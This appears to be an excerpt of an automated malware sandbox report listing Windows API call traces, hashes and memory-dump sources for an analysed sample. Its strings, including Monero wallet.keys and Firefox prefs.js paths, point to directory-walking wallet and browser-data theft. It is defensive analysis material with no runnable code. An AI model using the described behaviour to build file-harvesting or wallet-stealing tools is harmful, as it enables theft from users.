                                        • Instruction ID: 4538ea6ee1afc6faaf1c0a5776bfee90fac79b61e9e9ec97bde7f49f5345a7e7
                                        • Opcode Fuzzy Hash: 5fe93c820b04da049bc8b1f360577e82ffe6b8d2ec1640b3a9b922b7f211c3a8
                                        • Instruction Fuzzy Hash: 1AA141B1A003189BDB34DF64DC85FEA73B9BB48700F044588F64DAA185DB759B88CFA1
                                        APIs
                                        • wsprintfA.USER32 ref: 00E24B7C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E24B93
                                        • StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
                                        • StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
                                        • FindClose.KERNEL32(000000FF), ref: 00E24DE2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
                                        • Instruction ID: c24998078cb5f006cda52a82324474c056f1d01381671c43e785337ba3b2a5a8
                                        • Opcode Fuzzy Hash: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
                                        • Instruction Fuzzy Hash: 39615BB19002189BCB34EBA4EC59FEA77BCAB48700F0045DCF649A6185EB75DB84CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
                                        • wsprintfA.USER32 ref: 00E247F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2480D
                                        • StrCmpCA.SHLWAPI(?,00E30FAC), ref: 00E2483B
                                        • StrCmpCA.SHLWAPI(?,00E30FB0), ref: 00E24851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E248DB
                                        • FindClose.KERNEL32(000000FF), ref: 00E248F0
                                        • lstrcat.KERNEL32(?,01A8F1D8), ref: 00E24915
                                        • lstrcat.KERNEL32(?,01A8DA78), ref: 00E24928
                                        • lstrlen.KERNEL32(?), ref: 00E24935
                                        • lstrlen.KERNEL32(?), ref: 00E24946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
                                        • Instruction ID: 99b7152c738ccaf65423c5e4a6f153b58f852def7467f090446b72950a58e1a9
                                        • Opcode Fuzzy Hash: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
                                        • Instruction Fuzzy Hash: A55153B19002189BCB24EB74EC99FED77BCAB58700F4055D8F649A6084EB75DB84CF91
                                        APIs
                                        • wsprintfA.USER32 ref: 00E24113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2412A
                                        • StrCmpCA.SHLWAPI(?,00E30F94), ref: 00E24158
                                        • StrCmpCA.SHLWAPI(?,00E30F98), ref: 00E2416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E242BC
                                        • FindClose.KERNEL32(000000FF), ref: 00E242D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
                                        • Instruction ID: 1ec9f1e32b9e26dd9545faa71f7b5c6a3ee2192e22398ec088c54d72cecfb870
                                        • Opcode Fuzzy Hash: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
                                        • Instruction Fuzzy Hash: 805169B6900218ABCB34EBB0ED45EEA73BCBB54700F4055DDF649A6084DB759B85CF90
                                        APIs
                                        • wsprintfA.USER32 ref: 00E1EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E1EE55
                                        • StrCmpCA.SHLWAPI(?,00E31630), ref: 00E1EEAB
                                        • StrCmpCA.SHLWAPI(?,00E31634), ref: 00E1EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 00E1F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
                                        • Instruction ID: aa6ac95d41c5733a93bae60c9bde6bc4a7a18b8677c8aa8247a61b8037edee93
                                        • Opcode Fuzzy Hash: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
                                        • Instruction Fuzzy Hash: 88E110729111289BDB54FB60ED62EEE73BDAF54300F4855E9B40A72092EE306F89CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 38305e0411b1d5885c8b1d6319d2df50f651d289b61b93998b7f2a43a6d8ba56
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: BDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E316B0,00E30D97), ref: 00E1F81E
                                        • StrCmpCA.SHLWAPI(?,00E316B4), ref: 00E1F86F
                                        • StrCmpCA.SHLWAPI(?,00E316B8), ref: 00E1F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 00E1FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
                                        • Instruction ID: 69889e2a1c7e6c0ffdb106149468770df5a5ce0a7f147d403fda9a3ac285cf84
                                        • Opcode Fuzzy Hash: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
                                        • Instruction Fuzzy Hash: 9DB122719001289BCB24FF64ED96FED77B9AF54300F4495B8E50A76181EF31AB48CB92
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E3523C,?,?,?,00E352E4,?,?,00000000,?,00000000), ref: 00E11963
                                        • StrCmpCA.SHLWAPI(?,00E3538C), ref: 00E119B3
                                        • StrCmpCA.SHLWAPI(?,00E35434), ref: 00E119C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E11D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E11E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E11E60
                                        • FindClose.KERNEL32(000000FF), ref: 00E11E72
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
                                        • Instruction ID: 8952f95297d587a4d8fc0be566917d6f412d1b755f44f03a025602d7e012a631
                                        • Opcode Fuzzy Hash: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
                                        • Instruction Fuzzy Hash: 1512E1719101289BCB19FB60EC66EEEB3B9AF54300F4855F9B50676191EF306B88CF51
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E30C32), ref: 00E1DF5E
                                        • StrCmpCA.SHLWAPI(?,00E315C0), ref: 00E1DFAE
                                        • StrCmpCA.SHLWAPI(?,00E315C4), ref: 00E1DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 00E1E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
                                        • Instruction ID: fabf58c382b98c6c7338764833d002ff159cafee85f3fd1701309aacefc11859
                                        • Opcode Fuzzy Hash: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
                                        • Instruction Fuzzy Hash: C9F191719141289BCB15FB60DDA6EEEB3B9BF54300F4865E9B40A72091DF306B89CF51
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E315A8,00E30BAF), ref: 00E1DBEB
                                        • StrCmpCA.SHLWAPI(?,00E315AC), ref: 00E1DC33
                                        • StrCmpCA.SHLWAPI(?,00E315B0), ref: 00E1DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1DECC
                                        • FindClose.KERNEL32(000000FF), ref: 00E1DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
